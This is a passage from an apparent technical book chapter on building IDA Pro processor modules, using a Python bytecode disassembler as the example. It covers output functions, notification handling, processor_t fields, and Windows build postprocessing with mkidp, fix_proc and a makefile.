tions and the address of the next instruction because they are located relative

to the current instruction address. The fact that our processor can provide a

better disassembly only if it has a more detailed understanding of the file

structure is a limitation that we discuss in “Processor Module Architecture”

on page 409.

For similar reasons, we have elected not to track the stack pointer’s

behavior in our Python processor. This is primarily because IDA treats stack

pointer changes as relevant only when those changes are made within the

confines of a function and we have no means at present for recognizing func-

tion boundaries within Python code. If we were to implement stack-pointer

tracking, it would be wise to remember that, as a stack-based architecture, vir-

tually every Python instruction modifies the stack in some way. In this case, to

simplify the process of determining how much the stack pointer is changed

by each instruction, it might be easier to define an array of values, one per

Python instruction, that contains the amount by which each instruction mod-

ifies the stack. These amounts would then be used in calls to add_auto_stkpnt2

each time an instruction is emulated.
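
Such a table might look like the following sketch, which we have not implemented in our Python processor. Only four opcodes are filled in (using their Python 2.x numbers), the 4-byte SLOT_SIZE is an arbitrary assumption since Python stack items have no fixed size in the byte code, and py_stack_table and py_stack_delta are hypothetical names.

```cpp
#include <cassert>

const int PY_LAST = 148;   // one past the highest opcode (PYTHON_LAST)
const int SLOT_SIZE = 4;   // assumed bytes per stack slot, arbitrary here

// Net number of items each opcode pushes (positive) or pops (negative).
// Only a handful of entries are filled in; the rest default to 0.
struct py_stack_table {
    signed char net_items[PY_LAST];
    py_stack_table() : net_items() {
        net_items[1]   = -1;  // POP_TOP
        net_items[4]   = +1;  // DUP_TOP
        net_items[23]  = -1;  // BINARY_ADD: pops two items, pushes one
        net_items[100] = +1;  // LOAD_CONST
    }
};

// Delta to report for an opcode: negative when the stack grows.
int py_stack_delta(const py_stack_table &t, int opcode) {
    assert(opcode >= 0 && opcode < PY_LAST);
    return -t.net_items[opcode] * SLOT_SIZE;
}
```

Instructions such as CALL_FUNCTION, whose stack effect depends on the operand, would need to be handled separately because a fixed table cannot describe them.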

Once the emulator has added all of the cross-references that it can and

made any other modifications to the database that it deems necessary, you

are ready to start generating output. In the following section, we discuss the

role of the outputter in generating IDA’s disassembly display.

The Outputter

The purpose of the outputter is to output a single disassembled instruction,

as specified by the cmd global variable, to the IDA display. In IDA processor

modules, the outputter is typically implemented by a function named out

(you may name it anything you like) in a file named out.cpp. Like the ana and

emu functions, the prototype for this function is very simple, as shown here:

void idaapi out(void); //output a single disassembled instruction

You must initialize the u_out member of the LPH object with a pointer to

your output function. By the time out is called, cmd has been initialized by the

analyzer. Your output function should not make any changes to the database.

You are also required to create a helper function whose sole purpose is to

format and output a single instruction operand. This function is typically

named outop and is pointed to by the u_outop member of LPH. Your out func-

tion should not call outop directly. Instead, you should call out_one_operand

each time you need to print an operand portion of your disassembly lines.

Data output operations are handled by a separate function typically named

cpu_data and specified by the d_out member field of the LPH object. In our

Python processor, this function is named python_data.

Output lines in a disassembly listing are composed of several compo-

nents, such as a prefix, a name label, a mnemonic, operands, and possibly a

comment. The IDA kernel retains responsibility for rendering some of these

components (such as prefixes, comments, and cross-references), while oth-

ers are the responsibility of the processor’s outputter. Several useful func-

tions for generating pieces of an output line are declared in ua.hpp under

the following heading:

//--------------------------------------------------------------------------

// I D P H E L P E R F U N C T I O N S - O U T P U T

//--------------------------------------------------------------------------


Colorizing portions of each output line is possible through the use of

functions that insert special color tags into your output buffers. Additional

functions for generating output lines may be found in lines.hpp.

Rather than use a console-style output model in which you write content

directly to the IDA display, IDA utilizes a buffer-based output scheme in which

you must write a single line of display text into a character buffer and then

ask IDA to display your buffer. The basic process for generating an output

line follows:

1. Call init_output_buffer(char *buf, size_t bufsize) (declared in ua.hpp) to

initialize your output buffer.

2. Utilize the buffer output functions in ua.hpp to generate a single line of

content by adding to the initialized buffer. Most of these functions auto-

matically write to the destination buffer specified in the previous step,

so there is often no need to explicitly pass a buffer into these functions.

These functions are typically named out_xxx or OutXxx.

3. Call term_output_buffer() to finalize your output buffer, making it ready

to send to the IDA kernel for display.

4. Send the output buffer to the kernel using either MakeLine or printf_line

(both declared in lines.hpp).

Note that init_output_buffer, term_output_buffer, and MakeLine are usually

called only within your out function. Your outop function typically makes use

of the current output buffer as initialized by out and usually has no need to

initialize its own output buffers.
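The four steps above can be modeled outside of IDA to make the flow concrete. Everything in the following sketch (LineBuffer, sketch_init, sketch_append, sketch_term, sketch_emit, and the display vector) is a hypothetical stand-in written for illustration; none of it is SDK code, and the real functions may behave differently in their details.

```cpp
#include <cassert>
#include <cstdarg>
#include <cstdio>
#include <string>
#include <vector>

// Hypothetical stand-in for the output buffer state tracked between calls.
struct LineBuffer {
   char  *buf = nullptr;   // caller-supplied storage
   size_t size = 0;        // capacity of buf in bytes
   size_t used = 0;        // bytes written so far, excluding the terminator
};

static LineBuffer current;                 // plays the role of the current output buffer
static std::vector<std::string> display;   // plays the role of the IDA listing

// Step 1: remember the destination buffer and start with an empty line.
void sketch_init(char *buf, size_t bufsize) {
   assert(buf != nullptr && bufsize > 0);
   current.buf = buf; current.size = bufsize; current.used = 0;
   buf[0] = '\0';
}

// Step 2: append formatted text to whatever buffer was set in step 1.
void sketch_append(const char *format, ...) {
   if (current.used + 1 >= current.size) return;   // no buffer, or no room left
   va_list va;
   va_start(va, format);
   int n = std::vsnprintf(current.buf + current.used,
                          current.size - current.used, format, va);
   va_end(va);
   if (n < 0) return;
   size_t room = current.size - current.used - 1;
   current.used += ((size_t)n < room) ? (size_t)n : room;   // account for truncation
}

// Step 3: finish the line; later appends are ignored until the next init.
void sketch_term() { current.buf = nullptr; current.size = 0; current.used = 0; }

// Step 4: hand one finished line to the display.
void sketch_emit(const char *line) { display.push_back(line); }
```

Note that the appending function never receives a buffer argument. This mirrors the way the convenience functions rely on the destination established during initialization.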

Strictly speaking, you can skip all of the buffer manipulation described

in the first three steps of the preceding list and go straight to calling MakeLine

as long as you don’t mind taking complete control of the buffer-generation

process and passing up the convenience functions offered in ua.hpp. In addi-

tion to assuming a default destination for generated output (as specified via

init_output_buffer), many of the convenience functions automatically work with

the current contents of the cmd variable. Some of the more useful convenience

functions from ua.hpp are described here:

OutMnem(int width, char *suffix)

Outputs the mnemonic that corresponds to cmd.itype in a field of at least

width characters, appending the specified suffix. At least one space is

printed after the mnemonic. The default width is 8, and the default suf-

fix is NULL. An example of the use of the suffix value might be for oper-

and size modifiers, as in the following x86 mnemonics: movsb, movsw, movsd.

out_one_operand(int n)

Invokes your processor’s outop function to print cmd.Operands[n].

out_snprintf(const char *format, ...)

Appends formatted text to the current output buffer.


OutValue(op_t &op, int outflags)

Outputs constant fields of an operand. This function outputs op.value or

op.addr, depending on the value of outflags. See ua.hpp for the meaning

of outflags, which defaults to 0. This function is meant to be called from

within outop.

out_symbol(char c)

Outputs the given character using the current color for punctuation

(COLOR_SYMBOL as defined in lines.hpp). This function is primarily used

for outputting the syntactic elements within operands (thus called from

outop), such as commas and brackets.

out_line(char *str, color_t color)

Appends the given string, in the given color, to the current output

buffer. Colors are defined in lines.hpp. Note that this function does not

output a line at all. A better name for this function might be out_str.

OutLine(char *str)

Same as out_line but without the use of color.

out_register(char *str)

Outputs the given string using the current color for registers (COLOR_REG).

out_tagon(color_t tag)

Inserts a turn color on tag into the output buffer. Subsequent output to

the buffer will be displayed in the given color until a turn color off tag is

encountered.

out_tagoff(color_t tag)

Inserts a turn color off tag into the output buffer.

Please refer to ua.hpp for additional output functions that may be of use

in building your outputter.
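To picture what the color tag functions do to a buffer, consider the following self-contained sketch. The tag byte values and the layout (a tag byte followed by a color code) are assumptions made for the sketch; lines.hpp is the authority on the real encoding. The colorize and strip_tags helpers are hypothetical names, not SDK functions.

```cpp
#include <cassert>
#include <string>

// Assumed tag bytes for this sketch; lines.hpp defines the real values.
const char TAG_ON  = '\x01';
const char TAG_OFF = '\x02';

// Wrap text in a "turn color on" / "turn color off" pair for one color code.
std::string colorize(const std::string &text, char color) {
   assert(color != '\0');   // a NUL color code would cut a C string short
   std::string out;
   out += TAG_ON;  out += color;
   out += text;
   out += TAG_OFF; out += color;
   return out;
}

// Recover the visible text by dropping each tag byte and the color code after it.
std::string strip_tags(const std::string &line) {
   std::string out;
   for (size_t i = 0; i < line.size(); i++) {
      if (line[i] == TAG_ON || line[i] == TAG_OFF) {
         i++;          // skip the color code that follows the tag
         continue;
      }
      out += line[i];
   }
   return out;
}
```

One consequence of this scheme is that a buffer's length in bytes is larger than the number of characters the user sees, which matters when you size output buffers or align columns.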

One output capability that is missing from ua.hpp is the ability to easily

output a register name. During the analysis phase, register numbers are

stored into an operand’s reg or phrase field, depending on the addressing

mode used for that operand. Since many operands make use of registers, it

would be nice to have a function that quickly outputs a register string given

a register number. The following function provides a minimal capability to

do so:

//with the following we can do things like: OutReg(op.reg);
void OutReg(int regnum) {
   out_register(ph.regNames[regnum]);  //use regnum to index register names array
}

IDA calls your out function only as needed, when an address comes into

view in one of the IDA displays or when portions of a line are reformatted.

Each time out is called, it is expected to output as many lines as are necessary

to represent the instruction described in the cmd global variable. In order to

do this, out will generally make one or more calls to MakeLine (or printf_line).

In most cases one line (and hence one call to MakeLine) will be sufficient.


When more than one line is required to describe an instruction, you should

never add carriage returns to your output buffers in an attempt to generate

several lines at once. Instead, you should make multiple calls to MakeLine to

output each individual line. The prototype for MakeLine is shown here:

bool MakeLine(const char *contents, int indent = -1);

An indent value of -1 requests default indentation, which is the current
value of inf.indent as specified in the Disassembly section of the Options ▸
General dialog. The indent parameter has additional meaning when an
instruction (or data) spans several lines in the disassembly. In a multiline
instruction, an indent of -1 designates a line as the most important line for

that instruction. Please refer to the comments for the printf_line function

in lines.hpp for more information on using indent in this manner.
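The one-call-per-line rule can be illustrated with a small model. In the sketch below, emit_one_line is a hypothetical stand-in for a MakeLine-style call and listing stands in for the display; the rejection of embedded line breaks is a choice made by the sketch to make the rule visible, not documented SDK behavior.

```cpp
#include <cassert>
#include <string>
#include <vector>

static std::vector<std::string> listing;   // hypothetical stand-in for the display

// Stand-in for a MakeLine-style call: accepts exactly one line of text.
bool emit_one_line(const std::string &line) {
   if (line.find_first_of("\r\n") != std::string::npos) {
      return false;                        // refuse embedded line breaks
   }
   listing.push_back(line);
   return true;
}

// Emit each piece of a multiline instruction with its own call.
size_t emit_lines(const std::vector<std::string> &pieces) {
   assert(!pieces.empty());   // an instruction is expected to produce at least one line
   size_t emitted = 0;
   for (const std::string &p : pieces) {
      if (emit_one_line(p)) emitted++;
   }
   return emitted;
}
```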

Up to this point, we have avoided discussion of comments. Like names

and cross-references, comments are handled by the IDA kernel. However,

you are afforded some control over which line of a multiline instruction the

comment is displayed on. The display of comments is controlled to some

extent by a global variable named gl_comm, which is declared in lines.hpp. The

most important thing to understand about gl_comm is that comments cannot

be displayed at all unless gl_comm is set to 1. If gl_comm is 0, then a comment

will not be displayed at the end of the output you have generated, even if the

user has entered one and comments are enabled in the Options ▸ General

settings. The trouble is, gl_comm defaults to 0, so you need to make sure that

you set it to 1 at some point if you ever expect users to see comments while

using your processor module. When your out function generates multiple

lines, you need to control gl_comm if you want any user-entered comments to

be displayed on anything other than your first line of output.

With the highlights of building an outputter under our belts, here is the

out function for our example Python processor:

void py_out(void) {
   char str[MAXSTR];  //MAXSTR is an IDA define from pro.h
   init_output_buffer(str, sizeof(str));
   OutMnem(12);       //first we output the mnemonic
   if (cmd.Op1.type != o_void) {  //then there is an argument to print
      out_one_operand(0);
   }
   term_output_buffer();
   gl_comm = 1;       //we want comments!
   MakeLine(str);     //output the line with default indentation
}

The function works its way through the components of a disassembled

line in a very simple fashion. If Python instructions could take two operands,

we might use out_symbol to output a comma and then call out_one_operand a

second time to output the second operand. In most cases, your outop func-

tion will be somewhat more complex than your out function, as the structure

of an operand is generally more complex than the high-level structure of an


instruction. A typical approach for implementing the outop function is to use

a switch statement to test the value of the operand’s type field and format the

operand accordingly.
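For a processor with richer operands than our Python example, the switch-based approach might be sketched as follows. The SketchOp structure, its type constants, the register names, and the output syntax are all invented for illustration; the SDK's op_t carries more fields, and a real outop would write into the current output buffer rather than a std::string.

```cpp
#include <cassert>
#include <cstdio>
#include <string>

// Hypothetical operand model for this sketch; the SDK's op_t has more fields.
enum SketchOpType { SK_VOID, SK_REG, SK_IMM, SK_DISPL, SK_NEAR };
struct SketchOp {
   SketchOpType type;
   int reg;               // register number for SK_REG and SK_DISPL
   unsigned long value;   // immediate value or displacement
   unsigned long addr;    // target address for SK_NEAR
};

static const char *const reg_names[] = { "r0", "r1", "sp", "pc" };
static const int NUM_REGS = sizeof(reg_names) / sizeof(reg_names[0]);

// Map a register number to its name; out-of-range numbers are a caller bug.
static const char *reg_name(int regnum) {
   assert(regnum >= 0 && regnum < NUM_REGS);
   return reg_names[regnum];
}

// Format one operand according to its type; returns false for unknown types.
bool format_operand(const SketchOp &op, std::string &out) {
   char tmp[64];
   switch (op.type) {
      case SK_REG:     // plain register
         std::snprintf(tmp, sizeof(tmp), "%s", reg_name(op.reg));
         break;
      case SK_IMM:     // immediate constant
         std::snprintf(tmp, sizeof(tmp), "#%lXh", op.value);
         break;
      case SK_DISPL:   // register plus displacement
         std::snprintf(tmp, sizeof(tmp), "[%s+%lXh]", reg_name(op.reg), op.value);
         break;
      case SK_NEAR:    // code address
         std::snprintf(tmp, sizeof(tmp), "loc_%lX", op.addr);
         break;
      default:         // SK_VOID and anything unrecognized
         return false;
   }
   out = tmp;
   return true;
}
```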

In our Python example, we are forced to use a very simple outop function,

because in most cases we lack the information required to translate the inte-

ger operands into anything more intelligible. Our implementation is shown

here, with special handling for comparisons and relative jumps only:

const char *compare_ops[] = {
   "<", "<=", "==", "!=", ">", ">=",
   "in", "not in", "is", "is not", "exception match"
};

bool idaapi py_outop(op_t& x) {
   if (cmd.itype == COMPARE_OP) {
      //For comparisons, the argument indicates the type of comparison to be
      //performed. Print a symbolic representation of the comparison rather
      //than a number.
      if (x.value < qnumber(compare_ops)) {
         OutLine(compare_ops[x.value]);
      }
      else {
         OutLine("BAD OPERAND");
      }
   }
   else if (cmd.auxpref & HAS_JREL) {
      //we don't test for x.type == o_near here because we need to distinguish
      //between relative jumps and absolute jumps. In our case, HAS_JREL
      //implies o_near
      out_name_expr(x, x.addr, x.addr);
   }
   else {  //otherwise just print the operand value
      OutValue(x);
   }
   return true;
}

In addition to disassembled instructions, a disassembly listing usually

contains bytes that should be represented as data. In the output stage, data

display is handled by the d_out member of the LPH object. The kernel calls the

d_out function to display any bytes that are not part of an instruction, whether

the datatype of those bytes is unknown or whether the bytes have been format-

ted as data by the user or the emulator. The prototype for d_out is shown here:

void idaapi d_out(ea_t ea); //format data at the specified address

The d_out function should examine the flags associated with the address

specified by the ea parameter and generate an appropriate representation of

the data in the style of the assembly language being generated. This function

must be specified for all processor modules. A bare-bones implementation is

offered by the SDK in the form of the intel_data function, but it is unlikely to


meet your specific needs. In our Python example, we actually have very little

need to format static data because we don’t have the means to locate it. For

the sake of example, we make use of the function shown here:

void idaapi python_data(ea_t ea) {
   char obuf[256];
   init_output_buffer(obuf, sizeof(obuf));
   flags_t flags = get_flags_novalue(ea);  //get the flags for address ea
   if (isWord(flags)) {  //output a word declaration
      out_snprintf("%s %xh", ash.a_word ? ash.a_word : "", get_word(ea));
   }
   else if (isDwrd(flags)) {  //output a dword declaration
      out_snprintf("%s %xh", ash.a_dword ? ash.a_dword : "", get_long(ea));
   }
   else {  //we default to byte declarations in all other cases
      int val = get_byte(ea);
      char ch = ' ';
      if (val >= 0x20 && val <= 0x7E) {
         ch = val;
      }
      out_snprintf("%s %02xh ; %c", ash.a_byte ? ash.a_byte : "", val, ch);
   }
   term_output_buffer();
   gl_comm = 1;
   MakeLine(obuf);
}

Functions for accessing and testing the flags associated with any address

in the database are available in bytes.hpp. In this example, the flags are tested

to determine whether the address represents word or dword data, and appro-

priate output is generated using the appropriate data declaration keyword

from the current assembler module. The global variable ash is an instance of

an asm_t struct that describes characteristics of the assembler syntax that is

being utilized in the disassembly. We would need significantly more logic in

order to generate more complex data displays, such as arrays.

Processor Notifications

In Chapter 17, we discussed the ability of plug-ins to hook various notification

messages using the hook_to_notification_point function. By hooking notifica-

tions, plug-ins could be informed of various actions taking place within the

database. The concept of notification messages exists for processor modules

as well, but processor notifications are implemented in a slightly different

manner than plug-in notifications.

All processor modules should set a pointer to a notification function in

the LPH object’s notify field. The prototype for notify is shown here:

int idaapi notify(idp_notify msgid, ...); //notify processor with a given msg


The notify function is a variable-arguments function that receives a noti-

fication code and a variable list of arguments specific to that notification code.

The complete list of available processor notification codes may be found in

idp.hpp. Notification messages range from simple actions such as loading (init)

and unloading (term) the processor to more complex notifications that code

or data is being created, functions are being added or deleted, or segments

are being added or deleted. The list of parameters supplied with each notifi-

cation code is also specified in idp.hpp. Before looking at an example of a

notify function, it is worth noting the following comments found only in

some of the SDK’s sample processor modules:

// A well-behaving processor module should call invoke_callbacks()

// in its notify() function. If invoke_callbacks function returns 0,

// then the processor module should process the notification itself.

// Otherwise the code should be returned to the caller.

In order to ensure that all modules that have hooked processor notifica-

tions are properly notified, the invoke_callbacks function should be called.

This causes the kernel to propagate the given notification message to all

registered callbacks. The notify function used in our Python processor is

shown here:

static int idaapi notify(processor_t::idp_notify msgid, ...) {
   va_list va;
   va_start(va, msgid);  //setup args list
   int result = invoke_callbacks(HT_IDP, msgid, va);
   if (result == 0) {
      result = 1;  //default success
      switch(msgid) {
         case processor_t::init:
            inf.mf = 0;  //ensure little endian!
            break;
         case processor_t::make_data: {
            //all four arguments are read in order, though only len is tested
            ea_t ea = va_arg(va, ea_t);
            flags_t flags = va_arg(va, flags_t);
            tid_t tid = va_arg(va, tid_t);
            asize_t len = va_arg(va, asize_t);
            if (len > 4) {  //our d_out can only handle byte, word, dword
               result = 0;  //disallow big data
            }
            break;
         }
      }
   }
   va_end(va);
   return result;
}

This notify function handles only two notification codes: init and

make_data. The init notification is handled in order to explicitly force the

kernel to treat data as little-endian. The inf.mf (most first) flag indicates the


endianness value in use by the kernel (0 for little and 1 for big). The

make_data notification is sent whenever an attempt is made to convert bytes

to data. In our case, the d_out function is capable of dealing with only byte,

word, and dword data, so the function tests the size of the data being created

and disallows anything larger than 4 bytes.
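The "offer it to the hooks first, then handle it yourself" pattern used by notify can be exercised without IDA. The following sketch models it with hypothetical names throughout (SketchMsg, sketch_cb_t, hooks, sketch_invoke_callbacks, sketch_notify); it assumes, as in our notify function, that a nonzero result from the callbacks is returned to the caller unchanged.

```cpp
#include <cassert>
#include <cstdarg>
#include <vector>

// Hypothetical notification codes and callback type for this sketch.
enum SketchMsg { SK_INIT, SK_MAKE_DATA };
typedef int (*sketch_cb_t)(int msgid, va_list va);

static std::vector<sketch_cb_t> hooks;   // stand-in for registered callbacks

// Offer the message to each hook; the first nonzero result wins.
int sketch_invoke_callbacks(int msgid, va_list va) {
   for (sketch_cb_t cb : hooks) {
      assert(cb != nullptr);
      va_list copy;
      va_copy(copy, va);            // each hook gets a fresh view of the arguments
      int code = cb(msgid, copy);
      va_end(copy);
      if (code != 0) return code;
   }
   return 0;
}

// Module-side handler: defer to hooks first, then apply default handling.
int sketch_notify(int msgid, ...) {
   va_list va;
   va_start(va, msgid);
   int result = sketch_invoke_callbacks(msgid, va);
   if (result == 0) {
      result = 1;                                  // default: success
      if (msgid == SK_MAKE_DATA) {
         unsigned long len = va_arg(va, unsigned long);
         if (len > 4) result = 0;                  // refuse items larger than a dword
      }
   }
   va_end(va);
   return result;
}
```

Because the arguments travel through a variable-argument list, the caller and the handler must agree exactly on the type of each argument; here the length is always passed and read as unsigned long.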

Other processor_t Members

In order to wind up the discussion on creating processor modules, we need

to at least touch on several additional fields in the LPH object. As mentioned

previously, there are a tremendous number of function pointers within this

structure. If you read through the definition of the processor_t struct in

idp.hpp, it is clear in some cases that you can safely set some function pointers

to NULL, and the kernel will not call them. It seems reasonable to assume

that you are required to provide implementations for all of the other func-

tions required by processor_t. As a general rule of thumb, you can often get

away with an empty stub function when you are at a loss as to what you should

do. In our Python processor, where it was not clear that NULL was a valid

value, we initialized function pointers as follows (refer to idp.hpp for the

behavior of each function):

header Points to empty function in example.

footer Points to empty function in example.

segstart Points to empty function in example.

segend Points to empty function in example.

is_far_jump Is set to NULL in example.

translate Is set to NULL in example.

realcvt Points to ieee_realcvt from ieee.h.

is_switch Is set to NULL in example.

extract_address Points to a function that returns (BADADDR - 1) in

example.

is_sp_based Is set to NULL in example.

create_func_frame Is set to NULL in example.

get_frame_retsize Is set to NULL in example.

u_outspec Is set to NULL in example.

set_idp_options Is set to NULL in example.

In addition to these function pointers, the following three data members

are worth mentioning:

shnames A NULL-terminated array of character pointers that point to

short names (fewer than nine characters) associated with the processor

(such as python). Terminate this array with a NULL pointer.


lnames A NULL-terminated array of character pointers that point to

long names associated with the processor (such as Python 2.4 byte code).

This array should contain the same number of elements as the shnames

array.

asms NULL-terminated array of pointers to target assembler (asm_t)

structs.

The shnames and lnames arrays specify the names of all processor types that

can be handled by the current processor module. Users may select alternate

processors on the Analysis tab of the Options ▸ General dialog, as shown in

Figure 19-1.
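Because shnames and lnames are parallel NULL-terminated arrays, code that consumes them typically walks until it reaches the NULL pointer. The following sketch shows one way to do that; the second entry in each table is invented for the sketch, and count_names and find_processor are hypothetical helpers rather than SDK functions.

```cpp
#include <cassert>
#include <cstring>

// Illustrative name tables; the second entry in each is invented for this sketch.
static const char *const sk_shnames[] = { "python", "python3", nullptr };
static const char *const sk_lnames[]  = { "Python 2.4 byte code",
                                          "Hypothetical later byte code",
                                          nullptr };

// Count entries in a NULL-terminated array of strings.
int count_names(const char *const *names) {
   int n = 0;
   while (names[n] != nullptr) n++;
   return n;
}

// Return the index of a short name, or -1 if the module does not list it.
// The same index selects the matching entry in the long names array.
int find_processor(const char *const *shnames, const char *wanted) {
   assert(shnames != nullptr && wanted != nullptr);
   for (int i = 0; shnames[i] != nullptr; i++) {
      if (std::strcmp(shnames[i], wanted) == 0) return i;
   }
   return -1;
}
```

Checking that both arrays contain the same number of entries, and that each short name stays under nine characters, is a cheap sanity test to run on your own tables.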

Processor modules that support multiple processors should process the

processor_t.newprc notification in order to be informed of processor changes.

Figure 19-1: Selecting alternate processors and assemblers

The asm_t structure is used to describe some of the syntactic elements of

an assembly language, such as the format of hexadecimal numbers, strings,

and character delimiters, as well as various keywords commonly used in

assembly languages. The intent of the asms field is to allow several different

styles of assembly language to be generated by a single processor module.

Processor modules that support multiple assemblers should process the

processor_t.newasm notification in order to be notified of assembler changes.

Ultimately, the completed version of our simple Python processor is

capable of generating code such as the following:

ROM:00156 LOAD_CONST 12

ROM:00159 COMPARE_OP ==

ROM:00162 JUMP_IF_FALSE loc_182

ROM:00165 POP_TOP


ROM:00166 LOAD_NAME 4

ROM:00169 LOAD_ATTR 10

ROM:00172 LOAD_NAME 5

ROM:00175 CALL_FUNCTION 1

ROM:00178 POP_TOP

ROM:00179 JUMP_FORWARD loc_183

ROM:00182 # ----------------------------------------------------------

ROM:00182 loc_182: # CODE XREF: ROM:00162j

ROM:00182 POP_TOP

ROM:00183

ROM:00183 loc_183: # CODE XREF: ROM:00179j

ROM:00183 LOAD_CONST 0

ROM:00186 RETURN_VALUE

While it is possible to generate Python disassemblies that reveal far more

information than this, they require far greater knowledge of the .pyc file for-

mat than was assumed for this example. A somewhat more fully featured

Python processor module is available on the book’s website.

Building Processor Modules

The process for building and installing an IDA processor module is very sim-

ilar to the process for building plug-ins and loaders, with one major differ-

ence that, if not followed, can result in the inability of IDA to utilize your

processor. Some minor differences in the build process include these:

1. File extensions for processors are .w32/.w64 on Windows, .ilx/.ilx64 on

Linux, and .imc/.imc64 on OS X platforms.

2. The build scripts for the SDK’s example processors (as well as our own)

store newly created processor binaries into <SDKDIR>/bin/procs.

3. Processor modules are installed by copying the compiled processor

binary to <IDADIR>/procs.

4. Windows processor modules are required to use a customized MS-DOS
stub (see footnote 4) supplied with the SDK.

5. Windows-based processor modules require a custom postprocessing step

not required by plug-ins and loaders. The purpose of this step is to insert

a processor description string into a specific location in the compiled

processor binary. The description string is displayed in the processor

drop-down list portion of IDA’s load-file dialog.

When you build a Windows-based processor module, you are expected
to utilize a custom MS-DOS stub supplied with the SDK (<SDKDIR>/module/stub).
In order to use a custom MS-DOS stub, you must instruct your linker to
use your stub rather than the default stub it would otherwise include. When
using Windows-specific compilers, it is occasionally possible to specify
alternate stubs through the use of module definition (.def) files. Borland build
tools (used by Hex-Rays) support the specification of alternate stubs using
.def files. The SDK includes <SDKDIR>/module/idp.def for your use if you
happen to be using Borland tools. The GNU and Microsoft linkers both support
.def files (albeit with a slightly different syntax); however, neither supports
the specification of alternate MS-DOS stubs, which clearly poses a problem if
you are using one of these compilers.

Footnote 4: An MS-DOS header stub includes an MS-DOS file header as well as
code to warn users that a Windows program cannot be executed in MS-DOS mode.

Assuming for a moment that you do manage to build your processor

module with the SDK-supplied custom MS-DOS stub, you must still insert

the processor description comment into the processor binary. This is the

purpose of the <SDKDIR>/bin/mkidp.exe utility. You may add a description

to a processor using the following syntax to invoke mkidp:

$ mkidp module description

Here, module is the path to your processor module, while description is a

textual description of your module in the following form:

Long module name:short module name

To add a description to our Python processor module, we might use the

following command line:

$ ./mkidp procs/python.w32 "Python Bytecode:python"

The mkidp utility attempts to insert the supplied description into the

named module at an offset of 128 bytes into the file, in space that lies between

the MS-DOS stub and the PE header, assuming such space exists. If there is

not enough space because the PE header is too close to the end of the MS-

DOS stub, you will receive the following error message:

mkidp: too long processor description

Things become more dependent on your tools at this point, because pro-

cessors built with the Microsoft linker will have enough space available to

insert a description, while processors built using the GNU linker will not.

In order to clear up the confusion in our minds and allow us to use

either Microsoft or GNU tools, we developed a utility that we call fix_proc,

which is available in the Chapter 19 section of the book’s website. The

fix_proc utility uses the same command-line syntax as mkidp, but it provides

additional behavior that allows it to insert a processor description into pro-

cessor modules built with most compilers. When fix_proc is executed, it

replaces a processor’s existing MS-DOS stub with the stub supplied with the

SDK (thus eliminating the need to use .def files in the build process). At the

same time, fix_proc performs the necessary actions to relocate the proces-

sor’s PE headers to create sufficient space to hold the processor-description

string, before ultimately inserting the description string into the proper loca-

tion within the processor binary. We use fix_proc as a replacement for mkidp

in performing the required postprocessing steps on processor modules.


NOTE Strictly speaking, use of the SDK’s MS-DOS stub for processor modules is not required.

IDA is happy with a processor module as long as it finds a description string 128 bytes

into the processor module. In fix_proc, we replace the existing MS-DOS stub with the

SDK stub simply to avoid any possible conflicts over the space dedicated to the descrip-

tion string.
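Whether a given binary has room for a description can be estimated before running either tool. The sketch below reads the PE header offset from the e_lfanew field at offset 0x3C of the MS-DOS header and compares the gap after offset 128 with the length of the description. The helper names are hypothetical, and the assumption that the string needs exactly one terminating NUL byte is ours; the precise space check performed by mkidp is not described here.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <vector>

const size_t DESC_OFFSET   = 128;    // where the description string is expected
const size_t LFANEW_OFFSET = 0x3C;   // e_lfanew field of the MS-DOS header

// Read the little-endian file offset of the PE header from an image in memory.
// Returns 0 if the image is too small to contain the field.
uint32_t pe_header_offset(const std::vector<uint8_t> &image) {
   if (image.size() < LFANEW_OFFSET + 4) return 0;
   return  (uint32_t)image[LFANEW_OFFSET]
        | ((uint32_t)image[LFANEW_OFFSET + 1] << 8)
        | ((uint32_t)image[LFANEW_OFFSET + 2] << 16)
        | ((uint32_t)image[LFANEW_OFFSET + 3] << 24);
}

// Number of bytes between offset 128 and the PE header (0 if there is no gap).
size_t description_room(const std::vector<uint8_t> &image) {
   uint32_t pe = pe_header_offset(image);
   return pe > DESC_OFFSET ? pe - DESC_OFFSET : 0;
}

// Assumes the string is stored with one terminating NUL byte.
bool description_fits(const std::vector<uint8_t> &image, const char *desc) {
   assert(desc != nullptr);
   return std::strlen(desc) + 1 <= description_room(image);
}
```

A result of false corresponds to the situation in which the PE header sits too close to the end of the stub, which is the case that fix_proc addresses by relocating the PE headers.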

Table 19-1 describes the features of processors based on the tools used to
build them.

Table 19-1: Postprocessing IDA Processor Modules (by Compiler)

             Initial Build            After mkidp                    After fix_proc
Tool         Uses .def?   Has stub?   Has stub?   Has description?   Has stub?   Has description?
Borland      Yes          Yes         Yes         Yes                Yes         Yes
Microsoft    No           No          No          Yes                Yes         Yes
GNU          No           No          No          No                 Yes         Yes

Only processors that have valid descriptions will be listed in the file-
loading dialog. In other words, without a valid description field, it is not
possible to select a processor module.

All of these differences in the build process require a few more modifications
to the makefile presented in Listing 17-1 than were required to build
loader modules. Listing 19-1 shows a makefile modified to build our example
Python processor.

#Set this variable to point to your SDK directory
IDA_SDK=../../

PLATFORM=$(shell uname | cut -f 1 -d _)

ifneq "$(PLATFORM)" "MINGW32"
IDA=$(HOME)/ida
endif

#Set this variable to the desired name of your compiled processor
PROC=python

#(1) Specify a description string for your processor, this is required
#The syntax is <long name>:<short name>
DESCRIPTION=Python Bytecode:python

ifeq "$(PLATFORM)" "MINGW32"
PLATFORM_CFLAGS=-D__NT__ -D__IDP__ -DWIN32 -Os -fno-rtti
PLATFORM_LDFLAGS=-shared -s
LIBDIR=$(shell find ../../ -type d | grep -E "(lib|lib/)gcc.w32")
ifeq ($(strip $(LIBDIR)),)
LIBDIR=../../lib/x86_win_gcc_32
endif
IDALIB=$(LIBDIR)/ida.a
PROC_EXT=.w32

else ifeq "$(PLATFORM)" "Linux"
PLATFORM_CFLAGS=-D__LINUX__
PLATFORM_LDFLAGS=-shared -s
IDALIB=-lida
IDADIR=-L$(IDA)
PROC_EXT=.ilx

else ifeq "$(PLATFORM)" "Darwin"
PLATFORM_CFLAGS=-D__MAC__
PLATFORM_LDFLAGS=-dynamiclib
IDALIB=-lida
IDADIR=-L$(IDA)/idaq.app/Contents/MacOs
PROC_EXT=.imc
endif

#Platform specific compiler flags
CFLAGS=-Wextra $(PLATFORM_CFLAGS)

#Platform specific ld flags
LDFLAGS=$(PLATFORM_LDFLAGS)

#specify any additional libraries that you may need
EXTRALIBS=

# Destination directory for compiled processors
